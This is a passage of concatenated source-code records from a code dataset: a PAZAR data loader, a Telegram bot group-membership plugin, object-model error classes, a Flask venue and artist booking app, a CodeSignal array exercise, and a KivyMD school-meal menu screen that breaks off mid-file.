'PazarInteraction',\n ('tf', 'target', 'pmid'),\n )\n\n url = urls.urls['pazar']['url_rescued']\n c = curl.Curl(url, silent = False)\n data = c.result\n\n return [\n PazarInteraction(*map(x.split('\\t').__getitem__, (1, 4, 10)))\n for x in ''.join(data.values()).split('\\n')\n if len(x) > 0\n 
]\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/pazar.py","file_name":"pazar.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"11087435685","text":"from telegram import Chat, Update, User\nfrom telegram.error import NetworkError, Forbidden\nfrom telegram.ext import CallbackContext, ChatMemberHandler\n\nfrom core.config import JoinGroups, config\nfrom core.plugin import Plugin, handler\nfrom core.services.cookies import CookiesService\nfrom core.services.players import PlayersService\nfrom core.services.users.services import UserAdminService\nfrom utils.chatmember import extract_status_change\nfrom utils.log import logger\n\n\nclass ChatMember(Plugin):\n def __init__(\n self,\n user_admin_service: UserAdminService = None,\n players_service: PlayersService = None,\n cookies_service: CookiesService = None,\n ):\n self.cookies_service = cookies_service\n self.players_service = players_service\n self.user_admin_service = user_admin_service\n\n @handler.chat_member(chat_member_types=ChatMemberHandler.MY_CHAT_MEMBER, block=False)\n async def track_chats(self, update: Update, context: CallbackContext) -> None:\n result = extract_status_change(update.my_chat_member)\n if result is None:\n return\n was_member, is_member = result\n user = update.effective_user\n chat = update.effective_chat\n if chat.type == Chat.PRIVATE:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 启用了机器人\", user.full_name, user.id)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 屏蔽了机器人\", user.full_name, user.id)\n elif chat.type in [Chat.GROUP, Chat.SUPERGROUP]:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 邀请BOT进入群 %s[%s]\", user.full_name, user.id, chat.title, chat.id)\n await self.greet(user, chat, context)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 从 %s[%s] 群移除Bot\", user.full_name, user.id, chat.title, chat.id)\n else:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 邀请BOT进入频道 %s[%s]\", user.full_name, user.id, chat.title, chat.id)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 从 %s[%s] 频道移除Bot\", user.full_name, user.id, chat.title, chat.id)\n\n async def greet(self, user: User, chat: Chat, context: CallbackContext) -> None:\n quit_status = True\n if config.join_groups == JoinGroups.NO_ALLOW:\n try:\n if await self.user_admin_service.is_admin(user.id):\n quit_status = False\n else:\n logger.warning(\"不是管理员邀请!退出群聊\")\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_AUTH_USER:\n try:\n if await self.cookies_service.get(user.id) is not None:\n quit_status = False\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_USER:\n try:\n if await self.players_service.get(user.id) is not None:\n quit_status = False\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_ALL:\n quit_status = False\n else:\n quit_status = True\n if quit_status:\n try:\n await context.bot.send_message(chat.id, \"派蒙不想进去!不是旅行者的邀请!\")\n except Forbidden as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except NetworkError as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except Exception as exc:\n logger.info(\"发送消息失败\", exc_info=exc)\n await context.bot.leave_chat(chat.id)\n else:\n 
try:\n await context.bot.send_message(chat.id, \"感谢邀请小派蒙到本群!请使用 /help 查看咱已经学会的功能。\")\n except Forbidden as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except NetworkError as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except Exception as exc:\n logger.info(\"发送消息失败\", exc_info=exc)\n","repo_name":"PaiGramTeam/PaiGram","sub_path":"plugins/system/chat_member.py","file_name":"chat_member.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"37"} +{"seq_id":"20336008079","text":"from typing import Optional, Any\n\nfrom objectmodel.base import ObjectModelABC, FieldABC\n\n\n__all__ = [\n 'FieldValidationError',\n 'FieldValueRequiredError',\n 'DuplicateFieldDefinitionError'\n]\n\n\nclass FieldValidationError(AttributeError):\n \"\"\" Field validation error \"\"\"\n\n def __init__(self, instance: Optional[ObjectModelABC], field: FieldABC, value: Any, message: str):\n super().__init__(f'Invalid value {value} for field {field!r} of {instance!r}: {message}')\n\n\nclass FieldValueRequiredError(AttributeError):\n \"\"\" Field is required but not set \"\"\"\n\n def __init__(self, instance: ObjectModelABC, field: FieldABC):\n super().__init__(f'Field {field!r} of {instance!r} is not set')\n\n\nclass DuplicateFieldDefinitionError(AttributeError):\n \"\"\" A field with this name is already present in model \"\"\"\n def __init__(self, field_name: str, class_name: str):\n super().__init__(f'Duplicate field definition found during {class_name} initialization, '\n f'field: {field_name}')\n","repo_name":"bshishov/objectmodel","sub_path":"src/objectmodel/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74523841066","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\nimport sys\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for, abort\nfrom flask_migrate import Migrate\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\n\n#Instantiate a Migrate object\nmigrate = Migrate(app, db)\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\nfrom models import *\n\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# 
Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n # write a query that selects all venue\n all_venues = (\n Venue.query.with_entities(Venue.city, Venue.state)\n .group_by(Venue.city, Venue.state)\n .all()\n )\n\n data = []\n # display all venues by city/state and name only. Call 'area' per venues. -html -Done\n for area in all_venues:\n venues_in_city = (\n Venue.query.filter(Venue.city == area[0])\n .filter(Venue.state == area[1])\n .all()\n )\n data.append({\"city\": area.city, \"state\": area.state, \"venues\": venues_in_city})\n\n # removed dummy code for neatness\n\n return render_template('pages/venues.html', areas=data);\n\n# Search Venue\n# ----------------------------------------------------------------\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n\n #write a search query using ilike() operator - Thank you Miguel Grinberg!\n search_term = request.form.get('search_term', '')\n venues = db.session.query(Venue).filter(Venue.name.ilike('%' + search_term + '%')).all()\n data = []\n\n #loop over venues and display. Similar to show_venue\n for venue in venues:\n num_upcoming_shows = 0\n shows = db.session.query(Show).filter(Show.venue_id == venue.id)\n for show in shows:\n if (show.start_time > datetime.now()):\n num_upcoming_shows += 1;\n\n data.append({\n \"id\": venue.id,\n \"name\": venue.name,\n \"num_upcoming_shows\": num_upcoming_shows\n })\n #use len() to count\n response={\n \"count\": len(venues),\n \"data\": data\n }\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/<venue_id>')\ndef show_venue(venue_id):\n\n #write a query that pulls all venue information by ID\n venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n\n list_shows = db.session.query(Show).filter(Show.venue_id == venue_id)\n past_shows = []\n upcoming_shows = []\n\n # will need to do an artist query \n for show in list_shows:\n artist = db.session.query(Artist.name, Artist.image_link).filter(Artist.id == show.artist_id).one()\n\n show_add = {\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time.strftime('%m/%d/%Y')\n }\n\n if (show.start_time < datetime.now()):\n #print(past_shows, file=sys.stderr)\n past_shows.append(show_add)\n else:\n print(show_add, file=sys.stderr)\n upcoming_shows.append(show_add)\n\n data = {\n \"id\": venue.id,\n \"name\": venue.name,\n \"genres\": venue.genres,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n \"image_link\": venue.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows),\n }\n\n\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', 
methods=['POST'])\ndef create_venue_submission():\n\n response = {}\n error = False\n try:\n name = request.form.get(\"name\")\n city = request.form.get(\"city\")\n state = request.form.get(\"state\")\n address = request.form.get(\"address\")\n phone = request.form.get(\"phone\")\n image_link = request.form['image_link']\n website = request.form.get(\"website\")\n facebook_link = request.form.get(\"facebook_link\")\n genres = request.form.getlist(\"genres\")\n # Created an if statement to accept True/False (wasn't working otherwise) Validated this through Knowledge as well.\n\n seeking_talent = True if 'seeking_talent' in request.form else False \n seeking_description = request.form['seeking_description']\n venue = Venue(\n name=name,\n city=city,\n state=state,\n address=address,\n phone=phone,\n image_link=image_link,\n website=website,\n genres=genres,\n facebook_link=facebook_link,\n seeking_talent=seeking_talent,\n seeking_description=seeking_description\n )\n response[\"name\"] = venue.name\n db.session.add(venue)\n db.session.commit()\n except:\n\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n\n db.session.close()\n if error == False:\n\n # on successful db insert, flash success\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n else:\n\n flash(\"An error occurred. Venue \" + request.form[\"name\"] + \" could not be listed.\")\n print(sys.exc_info())\n return render_template('pages/home.html')\n\n\n# Update Venue\n# ----------------------------------------------------------------\n@app.route('/venues/<venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n\n form = VenueForm()\n # query database and filter by ID\n venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n \n # populate the form with Data from DB\n form.name.data = venue.name\n form.city.data = venue.city\n form.state.data = venue.state\n form.address.data = venue.address\n form.phone.data = venue.phone\n form.genres.data = venue.genres\n form.image_link.data = venue.image_link\n form.facebook_link.data = venue.facebook_link\n form.website.data = venue.website\n form.seeking_talent.data = venue.seeking_talent\n form.seeking_description.data = venue.seeking_description\n\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues/<venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n form = VenueForm(request.form)\n venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n\n error = False\n\n # Get updated data from form\n name = request.form['name']\n city = request.form['city']\n state = request.form['state']\n address = request.form['address']\n phone = request.form['phone']\n genres = request.form.getlist('genres')\n image_link = request.form['image_link']\n facebook_link = request.form['facebook_link']\n website = request.form['website']\n seeking_talent = True if 'seeking_talent' in request.form else False\n seeking_description = request.form['seeking_description']\n\n try:\n # get venue by ID\n venue = Venue.query.get(venue_id)\n\n # store updated data in variables\n venue.name = name\n venue.city = city\n venue.state = state\n venue.address = address\n venue.phone = phone\n venue.genres = genres\n venue.image_link = image_link\n venue.facebook_link = facebook_link\n venue.website = website\n venue.seeking_talent = seeking_talent\n venue.seeking_description = seeking_description\n\n # commit changes to the DB\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n 
print(sys.exc_info())\n finally:\n db.session.close()\n\n # Show banner\n if error:\n flash('An error occurred. Venue '+ name + ' could not be updated.','danger'\n )\n else:\n flash('Venue '+ name + ' was successfully updated!', 'success'\n )\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n\n# Delete Venue\n# ----------------------------------------------------------------\n@app.route('/venues/<venue_id>', methods=['DELETE'])\ndef delete_venue(venue_id):\n error = False\n try:\n # To delete a venue, select venue by ID and db.session.delete\n venue = Venue.query.filter(Venue.id == venue_id).first()\n name = venue.name\n\n db.session.delete(venue)\n db.session.commit()\n\n except:\n\n error = True\n db.session.rollback()\n flash('An error occurred. Venue ' + name + ' wasn\\'t deleted.')\n finally:\n\n db.session.close()\n if error:\n flash('There was an error')\n else:\n # flash if successful\n flash('Venue was successfully deleted.'\n )\n\n # return success\n return render_template('pages/home.html')\n\n\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n\n # write a query to get all artists - done\n data = db.session.query(Artist).all()\n\n return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n\n #same as venue query\n search_term = request.form.get('search_term', '')\n artists = db.session.query(Artist).filter(Artist.name.ilike('%' + search_term + '%')).all()\n data = []\n\n for artist in artists:\n num_upcoming_shows = 0\n shows = db.session.query(Show).filter(Show.artist_id == artist.id)\n for show in shows:\n if(show.start_time > datetime.now()):\n num_upcoming_shows += 1;\n data.append({\n \"id\": artist.id,\n \"name\": artist.name,\n \"num_upcoming_shows\": num_upcoming_shows\n })\n response={\n \"count\": len(artists),\n \"data\": data\n }\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/<artist_id>')\ndef show_artist(artist_id):\n\n # Create an artist page: 1)query all data from Artist by unique id\n artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n\n list_shows = db.session.query(Show).filter(Show.artist_id == artist_id)\n past_shows = []\n upcoming_shows = []\n\n for show in list_shows:\n venue = db.session.query(Venue.name, Venue.image_link).filter(Venue.id == show.venue_id).one()\n\n show_add = {\n \"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"venue_image_link\": venue.image_link,\n \"start_time\": show.start_time.strftime('%m/%d/%Y')\n }\n\n if (show.start_time < datetime.now()):\n #print(past_shows, file=sys.stderr)\n past_shows.append(show_add)\n else:\n print(show_add, file=sys.stderr)\n upcoming_shows.append(show_add)\n\n data = {\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": artist.genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows),\n }\n\n return render_template('pages/show_artist.html', artist=data)\n\n\n# Update\n# 
----------------------------------------------------------------\n@app.route('/artists/<artist_id>/edit', methods=['GET'])\ndef edit_artist(artist_id):\n \n form = ArtistForm()\n # query database and filter by ID\n artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n \n # populate the form with Data from DB\n form.name.data = artist.name\n form.city.data = artist.city\n form.state.data = artist.state\n form.phone.data = artist.phone\n form.genres.data = artist.genres\n form.image_link.data = artist.image_link\n form.facebook_link.data = artist.facebook_link\n form.website.data = artist.website\n form.seeking_venue.data = artist.seeking_venue\n form.seeking_description.data = artist.seeking_description\n\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists/<artist_id>/edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n\n form = ArtistForm(request.form)\n artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n\n error = False\n\n # Get updated data from form\n name = request.form['name']\n city = request.form['city']\n state = request.form['state']\n phone = request.form['phone']\n genres = request.form.getlist('genres')\n image_link = request.form['image_link']\n facebook_link = request.form['facebook_link']\n website = request.form['website']\n seeking_venue = True if 'seeking_venue' in request.form else False\n seeking_description = request.form['seeking_description']\n\n try:\n # get artist by ID\n artist = Artist.query.get(artist_id)\n\n # store updated data in variables\n artist.name = name\n artist.city = city\n artist.state = state\n artist.phone = phone\n artist.genres = genres\n artist.image_link = image_link\n artist.facebook_link = facebook_link\n artist.website = website\n artist.seeking_venue = seeking_venue\n artist.seeking_description = seeking_description\n\n # commit changes to the DB\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n\n # Show banner\n if error:\n flash('An error occurred. 
Artist '+ name + ' could not be updated.','danger'\n )\n else:\n flash('Artist '+ name + ' was successfully updated!', 'success'\n )\n\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n\n# Create Artist\n# ----------------------------------------------------------------\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n # called upon submitting the new artist listing form\n response = {}\n error = False\n try:\n name = request.form.get(\"name\")\n city = request.form.get(\"city\")\n state = request.form.get(\"state\")\n phone = request.form.get(\"phone\")\n image_link = request.form.get('image_link')\n website = request.form.get('website')\n facebook_link = request.form.get(\"facebook_link\")\n genres = request.form.getlist(\"genres\")\n # Created an if statement to accept True/False (wasn't working otherwise)\n seeking_venue = True if 'seeking_venue' in request.form else False \n seeking_description = request.form['seeking_description']\n artist = Artist(\n name=name,\n city=city,\n state=state,\n phone=phone,\n image_link=image_link,\n genres=genres,\n website=website,\n facebook_link=facebook_link,\n seeking_venue=seeking_venue,\n seeking_description=seeking_description\n )\n response[\"name\"] = artist.name\n db.session.add(artist)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error == False:\n # on successful db insert, flash success\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\n else:\n flash(\"An error occurred. Artist \" + request.form[\"name\"] + \" could not be listed.\")\n print(sys.exc_info())\n\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows - done\n #Query shows database and do a join with Venue and Artist\n \n get_shows = db.session.query(Show).join(Venue).join(Artist).all()\n data = []\n # probably use a for loop to display all information from shows.html.\n for show in get_shows:\n data.append({\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": show.artist.name, \n \"artist_image_link\": show.artist.image_link,\n \"start_time\": show.start_time.strftime('%Y-%m-%d %H:%M:%S')\n })\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n error = False\n try: \n artist_id = request.form['artist_id']\n venue_id = request.form['venue_id']\n start_time = request.form['start_time']\n\n print(request.form)\n\n show = Show(artist_id=artist_id, venue_id=venue_id, start_time=start_time)\n db.session.add(show)\n db.session.commit()\n except: \n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally: \n db.session.close()\n if error: \n flash('An error occurred. 
Show could not be listed.')\n if not error: \n flash('Show was successfully listed')\n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"tonyrizzotto/fyyurproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":20532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36465121805","text":"#\n# * Core 99, Are Isomorphic\n# * Medium\n\n# * Two two-dimensional arrays are isomorphic if they have the same number of \n# * rows and each pair of respective rows contains the same number of elements.\n\n# Given two two-dimensional arrays, check if they are isomorphic.\n\n# Example\n\n# For\n\n# array1 = [[1, 1, 1],\n# [0, 0]]\n\n# and\n\n# array2 = [[2, 1, 1],\n# [2, 1]]\n\n# the output should be\n# areIsomorphic(array1, array2) = true;\n\n# For\n\n# array1 = [[2],\n# []]\n\n# and\n\n# array2 = [[2]]\n\n# the output should be\n# areIsomorphic(array1, array2) = false.\n\n# Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] array.array.integer array1\n\n# Guaranteed constraints:\n# 1 ≤ array1.length ≤ 5,\n# 0 ≤ array1[i].length ≤ 5,\n# 0 ≤ array1[i][j] ≤ 50.\n\n# [input] array.array.integer array2\n\n# Guaranteed constraints:\n# 1 ≤ array2.length ≤ 5,\n# 0 ≤ array2[i].length ≤ 5,\n# 0 ≤ array2[i][j] ≤ 50.\n\n# [output] boolean\n\n#%%\n\n# * Solution 1\ndef areIsomorphic(array1:list, array2:list)-> bool:\n n1 = len(array1)\n n2 = len(array2)\n if n1 != n2:\n return False\n for i in range(n1):\n if len(array1[i]) != len(array2[i]):\n return False\n\n return True\n\n\n# * Solution 2\ndef areIsomorphic2(array1:list, array2:list)-> bool:\n return (len(array1) == len(array2)) and all([len(array1[i]) == len(array2[i]) for i in range(len(array1))])\n\n\n# * Solution 3\ndef areIsomorphic3(array1:list, array2:list)-> bool:\n return list(map(len, array1)) == list(map(len, array2))\n\n\na1 = [[1,1,1],[0,0]]\na2 = [[2,1,1],[2,1]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)\n\na1 = [[2],[0,0]]\na2 = [[2],[1]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)\n\na1 = [[2],[0,0]]\na2 = [[2]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Core/C99AreIsomorphic.py","file_name":"C99AreIsomorphic.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25079118301","text":"#= main_screen =>\nfrom kivymd.app import MDApp\nfrom kivy.clock import Clock, mainthread\nfrom kivy.properties import ObjectProperty, NumericProperty\nfrom kivymd.uix.screen import MDScreen\n\nfrom datetime 
import datetime, timedelta\nimport threading\n\nfrom database_helpers import get_from_database\nfrom waiter.dataclasses import eAsistentMeal\nfrom waiter.helpers import get_selected, get_monday\n\n\nclass MainScreen(MDScreen):\n \"\"\"Main Screen Class\"\"\"\n date_of_menu = ObjectProperty() # DateTime | displayed date\n meals_back_week = ObjectProperty() # Array | meals for the previous week\n meals_curr_week = ObjectProperty() # Array | meals for the current week\n meals_next_week = ObjectProperty() # Array | meals for the following week\n curr_week_num = NumericProperty() # Integer | num of current week\n\n def __init__(self, **kwargs):\n \"\"\"When Component Initialized\"\"\"\n super().__init__(**kwargs)\n app = MDApp.get_running_app()\n date_today = datetime.now()\n\n self.date_of_menu = date_today\n if self.date_of_menu.strftime(\"%w\") == \"6\": # if day is saturday (no meals)\n self.date_of_menu += timedelta(days=2)\n elif self.date_of_menu.strftime(\"%w\") == \"0\": # if day is sunday (no meals)\n self.date_of_menu += timedelta(days=1)\n\n loading_card = [\n {\n \"text\": \"Loading\",\n \"secondary_text\": \"\",\n \"icon\": \"all-inclusive\",\n \"meal_id\": \"000000\",\n \"selected\": False,\n }\n ]\n self.meals_curr_week = [loading_card for i in range(5)]\n self.create_cards()\n\n if app.logged_in:\n threading.Thread(target=self.get_weekly_data).start()\n\n def on_enter(self):\n \"\"\"When Entering Screen\"\"\"\n app = MDApp.get_running_app()\n if not app.logged_in:\n app.show_dialog(\"Error\", \"Please login!\")\n return\n\n def clear_screen(self):\n \"\"\"Clears Screen\"\"\"\n self.meals_curr_week = [[] for i in range(5)]\n self.meals_back_week = [[] for i in range(5)]\n self.meals_next_week = [[] for i in range(5)]\n self.create_cards()\n\n def get_weekly_data(self):\n \"\"\"Prepares Shown Data\"\"\"\n app = MDApp.get_running_app()\n week_num = int(\n str((get_monday(self.date_of_menu) - app.first_week_school) / 7).split(\" \")[0]\n )\n monday = get_monday(self.date_of_menu)\n\n curr_meals = app.waiter.api.get_meal_data(\n week_num, monday, app.meals\n )\n self.meals_curr_week = self.get_meals(curr_meals)\n next_meals = app.waiter.api.get_meal_data(\n week_num + 1, monday + timedelta(days=7), app.meals\n )\n self.meals_next_week = self.get_meals(next_meals)\n back_meals = app.waiter.api.get_meal_data(\n week_num - 1, monday - timedelta(days=7), app.meals\n )\n self.meals_back_week = self.get_meals(back_meals)\n\n def set_date(*args):\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. 
%y\")\n )\n Clock.schedule_once(set_date)\n self.create_cards()\n\n def get_meals(self, meals):\n \"\"\"Reformats Fetched Data\"\"\"\n app = MDApp.get_running_app()\n selected_meals = get_selected(meals)\n week_meals = []\n for i in range(5): # each day\n day_meals = []\n tracker = 1\n for meal in meals[i]: # each meal\n if not meal.meal_text:\n no_data = {\n \"text\": \"No Data\",\n \"secondary_text\": \"\",\n \"icon\": \"alert-circle-outline\",\n \"meal_id\": \"000000\",\n \"selected\": False,\n \"changable\": False,\n }\n day_meals = [no_data]\n break\n meal_data = {\n \"text\": meal.meal_text,\n \"secondary_text\": f\"meni {tracker}\",\n \"icon\": app.meals[meal.meal_id],\n \"selected\": meal.selected,\n \"meal_id\": meal.meal_id,\n \"changable\": meal.changable,\n }\n day_meals.append(meal_data)\n tracker += 1\n week_meals.append(day_meals)\n\n return week_meals\n\n @mainthread\n def create_cards(self):\n \"\"\"Populates RecycleView\"\"\"\n self.ids.recycle_view.data = self.meals_curr_week[\n int(self.date_of_menu.strftime(\"%w\")) - 1\n ]\n\n def set_next_week(self, date, *args):\n \"\"\"Switches Weeks\"\"\"\n app = MDApp.get_running_app()\n week_num = int(str((get_monday(date) - app.first_week_school) / 7).split(\" \")[0])\n next_meals = app.waiter.api.get_meal_data(week_num, get_monday(date), app.meals)\n self.meals_next_week = self.get_meals(next_meals)\n\n def set_prev_week(self, date, *args):\n \"\"\"Switches Weeks\"\"\"\n app = MDApp.get_running_app()\n week_num = int(str((get_monday(date) - app.first_week_school) / 7).split(\" \")[0])\n back_meals = app.waiter.api.get_meal_data(week_num, get_monday(date), app.meals)\n self.meals_back_week = self.get_meals(back_meals)\n\n def date_forward(self):\n \"\"\"Toggles Date Forwards\"\"\"\n \"\"\"\n if friday => switches weeks\n if weekend => sets date to next monday\n \"\"\"\n app = MDApp.get_running_app()\n if self.date_of_menu.strftime(\"%w\") == \"5\":\n self.meals_back_week = self.meals_curr_week\n self.meals_curr_week = self.meals_next_week\n threading.Thread(\n target=self.set_next_week, args=(self.date_of_menu + timedelta(days=8),)\n ).start()\n\n self.date_of_menu += timedelta(days=1)\n if self.date_of_menu.strftime(\"%w\") == \"6\":\n self.date_of_menu += timedelta(days=2)\n elif self.date_of_menu.strftime(\"%w\") == \"0\":\n self.date_of_menu += timedelta(days=1)\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. %y\")\n )\n self.create_cards()\n\n def date_backward(self):\n \"\"\"Toggles Date Backwards\"\"\"\n \"\"\"\n if monday => switches weeks\n if weekend => sets date to last friday\n \"\"\"\n app = MDApp.get_running_app()\n if self.date_of_menu.strftime(\"%w\") == \"1\":\n self.meals_next_week = self.meals_curr_week\n self.meals_curr_week = self.meals_back_week\n threading.Thread(\n target=self.set_prev_week,\n args=(self.date_of_menu - timedelta(days=10),),\n ).start()\n\n self.date_of_menu -= timedelta(days=1)\n if self.date_of_menu.strftime(\"%w\") == \"6\":\n self.date_of_menu -= timedelta(days=1)\n elif self.date_of_menu.strftime(\"%w\") == \"0\":\n self.date_of_menu -= timedelta(days=2)\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. 
